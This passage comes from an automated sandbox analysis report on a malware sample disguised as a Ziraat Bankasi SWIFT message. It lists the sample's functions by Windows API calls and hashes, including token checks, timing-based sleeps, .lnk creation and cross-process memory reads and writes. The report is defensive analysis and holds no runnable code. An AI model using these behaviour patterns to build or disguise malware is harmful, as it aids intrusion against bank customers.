                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 842720411-0
                                                                                                                                                        • Opcode ID: ab1a6dac491a19c405aa8c3fdcb48567b8dee7d12fba4626a1b950b9699495a0
                                                                                                                                                        • Instruction ID: d407afcc348d0dfa7d4839293c8661420fb4b7b7e7cc9f7c2e802a4bdb01cf00
                                                                                                                                                        • Opcode Fuzzy Hash: ab1a6dac491a19c405aa8c3fdcb48567b8dee7d12fba4626a1b950b9699495a0
                                                                                                                                                        • Instruction Fuzzy Hash: 510119B1300204BFDB104FA9EC48DAB7FADEF8A7557100429F985D3260DAB19C80CB61
                                                                                                                                                        APIs
                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 000C7A74
                                                                                                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 000C7A82
                                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 000C7A8A
                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 000C7A94
                                                                                                                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 000C7AD0
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2833360925-0
                                                                                                                                                        • Opcode ID: f813bf8036300f43eb62fc996779f1426ac8e769984405879bec02abf02cb800
                                                                                                                                                        • Instruction ID: f94b6a234581f625f367fdf31de9db733f3069f0f0b9e562248c6aea6b09b722
                                                                                                                                                        • Opcode Fuzzy Hash: f813bf8036300f43eb62fc996779f1426ac8e769984405879bec02abf02cb800
                                                                                                                                                        • Instruction Fuzzy Hash: 93014835C0862DEBCF10AFE5EC48AEDBBB8FF5C711F010459E546B2650DB7096908BA2
                                                                                                                                                        APIs
                                                                                                                                                        • CLSIDFromProgID.OLE32 ref: 000B9ADC
                                                                                                                                                        • ProgIDFromCLSID.OLE32(?,00000000), ref: 000B9AF7
                                                                                                                                                        • lstrcmpiW.KERNEL32(?,00000000), ref: 000B9B05
                                                                                                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 000B9B15
                                                                                                                                                        • CLSIDFromString.OLE32(?,?), ref: 000B9B21
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3897988419-0
                                                                                                                                                        • Opcode ID: 0abd108eb740c5d893ef0328e9f3914bcf4768a17994c8f69a8f25263ce92116
                                                                                                                                                        • Instruction ID: cf4e003774068ee033ccb6a30a09288a4ee0a89b3df102b4c067379385dbc67c
                                                                                                                                                        • Opcode Fuzzy Hash: 0abd108eb740c5d893ef0328e9f3914bcf4768a17994c8f69a8f25263ce92116
                                                                                                                                                        • Instruction Fuzzy Hash: 06018F7A600218BFDB104FA4ED44FAA7AEDEF44351F148025FA45E2210D7B1DD809BA0
                                                                                                                                                        APIs
                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 000BAA79
                                                                                                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 000BAA83
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 000BAA92
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 000BAA99
                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 000BAAAF
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 44706859-0
                                                                                                                                                        • Opcode ID: 633f69a713138ac24689a8eee41dea64459d9ff45558744a159695834d6f7847
                                                                                                                                                        • Instruction ID: 5abdb35fb7d52ad309ab589e5c2627359af7c46f7aabc7ac3dee33259afd898b
                                                                                                                                                        • Opcode Fuzzy Hash: 633f69a713138ac24689a8eee41dea64459d9ff45558744a159695834d6f7847
                                                                                                                                                        • Instruction Fuzzy Hash: CCF04975200204AFEB115FE4AC89EAB3BACFF4A754F400429F985C71A0DBB09C81CA72
                                                                                                                                                        APIs
                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 000BAADA
                                                                                                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 000BAAE4
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 000BAAF3
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 000BAAFA
                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 000BAB10
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 44706859-0
                                                                                                                                                        • Opcode ID: 5c920d4a6637c06492794796ce6affb8f46ed24bed6fdf8ec98a0e2b356b3aa0
                                                                                                                                                        • Instruction ID: c38dd7f0add9b8af911548fd7435d1f233217239efdb91b11b0b5b5c021a6308
                                                                                                                                                        • Opcode Fuzzy Hash: 5c920d4a6637c06492794796ce6affb8f46ed24bed6fdf8ec98a0e2b356b3aa0
                                                                                                                                                        • Instruction Fuzzy Hash: 6FF04F753102086FEB110FA4FC98EA73BADFF4A754F000029F995D7190CBB098818A61
                                                                                                                                                        APIs
                                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 000BEC94
                                                                                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 000BECAB
                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 000BECC3
                                                                                                                                                        • KillTimer.USER32(?,0000040A), ref: 000BECDF
                                                                                                                                                        • EndDialog.USER32(?,00000001), ref: 000BECF9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3741023627-0
                                                                                                                                                        • Opcode ID: 9ac60ac60a9422154dfeb440b07ea9338bd573e29b8c97430f8903619ce949c1
                                                                                                                                                        • Instruction ID: 9009edc2cd48af79748b0f7c5a97146b695e3b121795d7db53bb939e7b06ee36
                                                                                                                                                        • Opcode Fuzzy Hash: 9ac60ac60a9422154dfeb440b07ea9338bd573e29b8c97430f8903619ce949c1
                                                                                                                                                        • Instruction Fuzzy Hash: 26018130500744ABEB345B50EE4EBD67BB8FB00705F000559B586A18E1DBF0AA89CB80
                                                                                                                                                        APIs
                                                                                                                                                        • EndPath.GDI32(?), ref: 0009B0BA
                                                                                                                                                        • StrokeAndFillPath.GDI32(?,?,000FE680,00000000,?,?,?), ref: 0009B0D6
                                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 0009B0E9
                                                                                                                                                        • DeleteObject.GDI32 ref: 0009B0FC
                                                                                                                                                        • StrokePath.GDI32(?), ref: 0009B117
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2625713937-0
                                                                                                                                                        • Opcode ID: f1a23ddd8965c3ada54bef970ccee73f419cc3ddd3840a2328a5de5b508c5c34
                                                                                                                                                        • Instruction ID: 4f97a66bae298bd08982022702d3359cb4403b0d415159fb8d62c5410535d0bc
                                                                                                                                                        • Opcode Fuzzy Hash: f1a23ddd8965c3ada54bef970ccee73f419cc3ddd3840a2328a5de5b508c5c34
                                                                                                                                                        • Instruction Fuzzy Hash: BDF0F638004308AFCB219FA9FD087583BA4A702372F488314F569448F0C7B089D6DF50
                                                                                                                                                        APIs
                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 000CF2DA
                                                                                                                                                        • CoCreateInstance.OLE32(0010DA7C,00000000,00000001,0010D8EC,?), ref: 000CF2F2
                                                                                                                                                        • CoUninitialize.OLE32 ref: 000CF555
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateInitializeInstanceUninitialize
                                                                                                                                                        • String ID: .lnk
                                                                                                                                                        • API String ID: 948891078-24824748
                                                                                                                                                        • Opcode ID: a8381e2b348ce3b7a9a11cfdbebc5c01d1243783fbfe617b82b5a38cfa87014d
                                                                                                                                                        • Instruction ID: d65a5a0db2935344d8d074e3fdd9f221d0bf6ec5246e7ebe2111bdb86580af2c
                                                                                                                                                        • Opcode Fuzzy Hash: a8381e2b348ce3b7a9a11cfdbebc5c01d1243783fbfe617b82b5a38cfa87014d
                                                                                                                                                        • Instruction Fuzzy Hash: A3A10BB1104201AFD700EF64C891EAFB7E8FF98714F04491DF59597192EB70EA49CB62
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0008660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000853B1,?,?,000861FF,?,00000000,00000001,00000000), ref: 0008662F
                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 000CE85D
                                                                                                                                                        • CoCreateInstance.OLE32(0010DA7C,00000000,00000001,0010D8EC,?), ref: 000CE876
                                                                                                                                                        • CoUninitialize.OLE32 ref: 000CE893
                                                                                                                                                          • Part of subcall function 0008936C: __swprintf.LIBCMT ref: 000893AB
                                                                                                                                                          • Part of subcall function 0008936C: __itow.LIBCMT ref: 000893DF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                                                        • String ID: .lnk
                                                                                                                                                        • API String ID: 2126378814-24824748
                                                                                                                                                        • Opcode ID: 491e523dca6e909d90a1457cac0776ead416b548d24e94fa2422f84a1477408d
                                                                                                                                                        • Instruction ID: e34ff072dc4dec0aca087f58c78e32650424abfbad951244aebee71d58cf2c02
                                                                                                                                                        • Opcode Fuzzy Hash: 491e523dca6e909d90a1457cac0776ead416b548d24e94fa2422f84a1477408d
                                                                                                                                                        • Instruction Fuzzy Hash: 17A12275604241AFCB10EF14C884E6EBBE5FF88310F148959F99A9B3A2CB31ED45CB91
                                                                                                                                                        APIs
                                                                                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 000A32ED
                                                                                                                                                          • Part of subcall function 000AE0D0: __87except.LIBCMT ref: 000AE10B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorHandling__87except__start
                                                                                                                                                        • String ID: pow
                                                                                                                                                        • API String ID: 2905807303-2276729525
                                                                                                                                                        • Opcode ID: 111f79a411bc8ee3a66684c1c5630015560dc63751f0d17d01155d340b64f05c
                                                                                                                                                        • Instruction ID: aaba059a758c1ce8a53bcda6e1c72ca263f7e7e1fae983a67ce1daa5b2795009
                                                                                                                                                        • Opcode Fuzzy Hash: 111f79a411bc8ee3a66684c1c5630015560dc63751f0d17d01155d340b64f05c
                                                                                                                                                        • Instruction Fuzzy Hash: 87513732A0C24196CB6577D8C9417BE7BD4DB43760F308D68F4C5862AAEF388ED49B42
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: #$+
                                                                                                                                                        • API String ID: 0-2552117581
                                                                                                                                                        • Opcode ID: a74f3077c6a54dcded9015e3dab3212c985770abda3ac4196f3048f53a8d3b9e
                                                                                                                                                        • Instruction ID: be9c0eec0ce0fd187dfd89f776acaadc9107fdcb92facdc5eb9b26b7ff97923a
                                                                                                                                                        • Opcode Fuzzy Hash: a74f3077c6a54dcded9015e3dab3212c985770abda3ac4196f3048f53a8d3b9e
                                                                                                                                                        • Instruction Fuzzy Hash: 7C51207150424A9FDB25EF29C844AFE7BE4BF25320F144055EDD1AB2A2D330DE42DB22
                                                                                                                                                        APIs
                                                                                                                                                        • CharUpperBuffW.USER32(0000000C,?,?,00000000,00000000,000000FF,?,00000004,?,0000000F,0000000C,?,00000000), ref: 000C4645
                                                                                                                                                          • Part of subcall function 0008936C: __swprintf.LIBCMT ref: 000893AB
                                                                                                                                                          • Part of subcall function 0008936C: __itow.LIBCMT ref: 000893DF
                                                                                                                                                        • CharUpperBuffW.USER32(?,00000004,00000000,0000000C,?,00000000,00000000,000000FF,?,00000004,?,0000000F,0000000C,?,00000000), ref: 000C46C5
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BuffCharUpper$__itow__swprintf
                                                                                                                                                        • String ID: REMOVE$THIS
                                                                                                                                                        • API String ID: 3797816924-776492005
                                                                                                                                                        • Opcode ID: 0ab96befd24d3f97fe1b6f4a03b8a3f1fa7dd65f473783bdce364db265bfa1f5
                                                                                                                                                        • Instruction ID: fb0ed7e7e06337f6e0494677f65f99dc5c213be0bc83a919782deaab321f56b2
                                                                                                                                                        • Opcode Fuzzy Hash: 0ab96befd24d3f97fe1b6f4a03b8a3f1fa7dd65f473783bdce364db265bfa1f5
                                                                                                                                                        • Instruction Fuzzy Hash: D0416674A042199FCF01EFA4C891EAEB7F5BF49304F148069E956AB2A2DB30AD45CB50
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 000C430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000BBC08,?,?,00000034,00000800,?,00000034), ref: 000C4335
                                                                                                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 000BC1D3
                                                                                                                                                          • Part of subcall function 000C42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000BBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 000C4300
                                                                                                                                                          • Part of subcall function 000C422F: GetWindowThreadProcessId.USER32(?,?), ref: 000C425A
                                                                                                                                                          • Part of subcall function 000C422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,000BBBCC,00000034,?,?,00001004,00000000,00000000), ref: 000C426A
                                                                                                                                                          • Part of subcall function 000C422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,000BBBCC,00000034,?,?,00001004,00000000,00000000), ref: 000C4280
                                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000BC240
                                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000BC28D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                        • String ID: @
                                                                                                                                                        • API String ID: 4150878124-2766056989
                                                                                                                                                        • Opcode ID: 20434cb8065095e29bac6f2dd65fd12ad8c265d7ed9629efdb08dee5968cdaf1
                                                                                                                                                        • Instruction ID: 4b3abcd4ce1379c691fbbf3da1625bc1d7a776ca9e8a8adb1ee94e429f52bc27
                                                                                                                                                        • Opcode Fuzzy Hash: 20434cb8065095e29bac6f2dd65fd12ad8c265d7ed9629efdb08dee5968cdaf1
                                                                                                                                                        • Instruction Fuzzy Hash: 5B411B72900218AFDB11DFA4CD92FEEB7B8FB49700F004099FA45B7181DA716E45CB61
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 000D5190
                                                                                                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 000D51C6
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CrackInternet_memset
                                                                                                                                                        • String ID: |$D
                                                                                                                                                        • API String ID: 1413715105-3794712380
                                                                                                                                                        • Opcode ID: 11dbb2034b6b4e994734e460859859322d8989251e7d7bdf465e8db99416a5d4
                                                                                                                                                        • Instruction ID: f8f08f1446bddbedd49826ec5e8e62c292af0bcb5bd3423e06b304378f259a37
                                                                                                                                                        • Opcode Fuzzy Hash: 11dbb2034b6b4e994734e460859859322d8989251e7d7bdf465e8db99416a5d4
                                                                                                                                                        • Instruction Fuzzy Hash: 64311971800119ABDF15AFE4CC85EEE7FB9FF19750F100016E815A6266DB31AA46DBA0
                                                                                                                                                        APIs
                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 000A65DD
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
